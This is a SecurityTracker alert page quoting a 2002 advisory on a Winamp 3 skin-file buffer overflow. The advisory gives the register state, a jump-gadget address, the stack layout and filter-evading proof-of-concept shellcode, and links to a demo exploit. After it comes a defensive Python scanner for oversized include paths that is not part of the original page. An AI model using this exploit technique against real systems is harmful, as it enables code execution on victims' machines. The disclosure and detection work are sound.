SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Multimedia)  >   Winamp
Vendors:   Nullsoft
Winamp Media Player Buffer Overflow in Parsing Skin Files Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1005323
SecurityTracker URL:  http://securitytracker.com/id/1005323
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Sep 30 2002
Impact:   Execution of arbitrary code via network, User access via network

Version(s): 3 (1.0.0.488)
Description:   A buffer overflow vulnerability was reported in the Winamp media player. A remote user can create a malicious skin file that will, when loaded, execute arbitrary code on the target user's computer.

Illegal Instruction Labs warned that a remote user can create a specially crafted skin file that will trigger a buffer overflow in wsabi.dll. If the <include file="PATH"/> tag contains a "huge" PATH value, the overflow may occur. Although the DLL filters most non-printable characters, it is still possible to create shell code that will execute, according to the report.

A demonstration exploit for Windows 98 is available at:

http://kamikaza.ffk.hr/advisory/default.wal

The target user's Internet Explorer browser will reportedly open *.WAL skin files automatically.

Impact:   A remote user can send a malicious skin file to a target user that will cause arbitrary code to be executed on the target user's system. The code would execute with the privileges of the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.winamp.com/
Cause:   Boundary error
Underlying OS:   Windows (Any)

Message History:   None.


 Source Message Contents

Date:  29 Sep 2002 18:00:28 -0000
Subject:  IIL Advisory: Winamp 3 (1.0.0.488) XML parser buffer overflow




                   [ Illegal Instruction Labs Advisory ]
[------------------------------------------------------------------------]
Advisory name:    Winamp 3 (1.0.0.488) XML parser buffer overflow
                  vulnerability
Application:      Winamp 3 1.0.0.488
Homepage:         www.winamp.com
Impact:           There is a buffer overflow inside XML parser DLL that
                  can cause execution of arbitrary code.
Platform:         All x86 win32, not tested on x86 Linux
Date:             29.9.2002
Tested on:        Windows Me (4.90)
Discovered by:    Sunnis
Mail me @:        annihilator@inet.hr



======[ Overview 

Winamp is (as we all know), the most popular MP3 player for Windows. 
Winamp 3 is a revolutionary successor of Winamp 2.xx having many new 
features, such as a new skinning system.

======[ Problem

Winamp 3 skin files are *.WAL and are automatically opened by MSIE. They 
are actually ZIP files with altered extension. They contain pictures and 
configuration files used by wsabi (Winamp skinning system). 

Wsabi engine is implemented inside wasabi.dll and is designed to provide 
very configurable, OS-independent system for building skinnable 
applications, quickly and easily (that's the reason why wsabi.dll is 800K 
big).

A buffer overflow inside wsabi.dll may occur if <include file="PATH"/>
tag is altered with extremely huge value for file PATH (btw, MAX_PATH on 
win32 is defined to be only 512B). This can allow the execution of 
arbitrary code inside the address space of Winamp. Wsabi filters most non-
printable characters but specially designed shellcode will still pass 
through.

======[ Exploit

By writing an extremely long string of 'A' chars and setting the kernel-
mode debugger to capture page faults, one can see that at the point of 
execution, both EAX and EBX contain pointers to [OverwrittenEIP-4]. ESP is 
unusable since it points to some strange value.

Winamp3 exe (studio.exe) loads many system DLLs which contain some usable
instructions:
        jmp eax
        jmp ebx
        call eax
        call ebx

On Windows Me there is such on 0x736D2120 (we can't use some of the 
Winamp's modules since their ASCII imagebase representation is NOT 
considered to be valid (between 0x20 and 0x7F) by Wsabi and will trigger 
an error message).

Stack would look like this:
['AAAAAAAAAAAA'... XXXX[OverwrittenEIP][shellcode]
                   ^^^^-address contained inside EAX and EBX

Sample proof of concept shellcode would look like this:

                                  ; ASCII opcode representation:
        jmp __skip                ; ë+
        db 0, 0
        dd 736D2120h              ; address of the "call eax" gadget above

        db 25h dup ('A')          ; needed because of JMP

__skip: mov eax, 39406567h        ; ¸ge@
        sub eax, 794c2421h        ; -!$Ly
        push eax                  ; P
        pop ecx                   ; Y
        ; eax = ecx = bff44146 = USER32!MessageBoxA on winMe

        push 'aaaa'               ; haaaa
        pop eax                   ; X
        xor eax, 'aaaa'           ; 5aaa
        ; eax = 0

        push eax                  ; P = NULL-terminator
        push "tiol"               ; hloit
        push "pxe "               ; h exp
        push "tpec"               ; hcept
        push "noc-"               ; h-con
        push "fo-f"               ; hf-of
        push "oorp"               ; hproo
        push " 3pm"               ; hmp3 
        push "aniW"               ; hWina
        push esp                  ; T
        pop edx                   ; Z
        ; edx = ptr to string

        push eax                  ; P
        push eax                  ; P
        push edx                  ; R
        push eax                  ; P

        push ebx                  ; S = return address

        push ecx                  ; Q = user32!MessageBoxA (v. 4.90.3000)
        retn                      ; Ă

Filtering chars doesn't provide any protection at all. Writing 
alphanumeric shellcode using specialized kits such as irx's ASC is even 
easier.

You can try this one here: kamikaza.ffk.hr/advisory/default.wal
It works on WinMe (4.90) only, but adaptation on other win32s is trivial.

======[ Greetz 

Greets go to all members of IIL (http://www.ii-labs.tk): BoyScout, 
DownBload, Fr1c, h4z4rd, StYx and (in no specific order): Elrond, 
harlequin, St0rm, Megaquad, Dark-igor, bila, phreax, Defiant and everyone 
else i forgot.
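As an added defensive check, not part of the advisory above or of Winamp's own code: the script below treats a .wal skin as the ZIP archive the advisory describes, scans its text members for <include file="..."/> tags and reports any whose path is longer than a plausible file path or that contains non-printable bytes. The threshold is an assumption (260, the Win32 MAX_PATH value); the archive, the member name skin.xml and the XML inside it are constructed for the demonstration and do not reproduce the real Winamp 3 skin layout.

```python
import io
import re
import zipfile

# Assumed threshold: Win32 MAX_PATH is 260 characters. A real include path
# never needs to be longer, so anything beyond it is treated as suspicious.
MAX_INCLUDE_PATH = 260

# Tolerant match for <include file="..."/>; a regex is used rather than a
# strict XML parser so a deliberately malformed file still gets inspected.
INCLUDE_RE = re.compile(rb'<include\b[^>]*?\bfile\s*=\s*"([^"]*)"', re.IGNORECASE)


def scan_skin_archive(data: bytes, max_len: int = MAX_INCLUDE_PATH) -> list[dict]:
    """Open a .wal (a ZIP with a renamed extension) held in memory and return
    one finding per <include file="..."/> whose path exceeds max_len."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        raise ValueError("not a ZIP archive; a .wal skin must be one")
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            content = zf.read(info)
            for match in INCLUDE_RE.finditer(content):
                path = match.group(1)
                if len(path) > max_len:
                    findings.append({
                        "member": info.filename,
                        "path_len": len(path),
                        # The advisory notes wsabi drops most non-printable
                        # bytes, so an oversized all-printable path is the
                        # shape a crafted file would take; record it either way.
                        "has_nonprintable": any(b < 0x20 or b > 0x7E for b in path),
                    })
    return findings


def build_sample_wal(include_path: bytes) -> bytes:
    """Constructed sample skin: a ZIP holding one skin.xml with a single
    include tag. The root element is invented for the demonstration."""
    xml = (b'<?xml version="1.0"?>\n<skin>\n'
           b'  <include file="' + include_path + b'"/>\n'
           b'</skin>\n')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("skin.xml", xml)
    return buf.getvalue()


if __name__ == "__main__":
    # A benign skin produces no findings; an oversized include path is reported.
    print(scan_skin_archive(build_sample_wal(b"gen.xml")))
    print(scan_skin_archive(build_sample_wal(b"A" * 2000)))
```

To check a skin file on disk, pass `open(path, "rb").read()` to `scan_skin_archive`; a non-empty result means the archive should not be opened in Winamp 3 before it has been looked at.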

Copyright 2013, SecurityGlobal.net LLC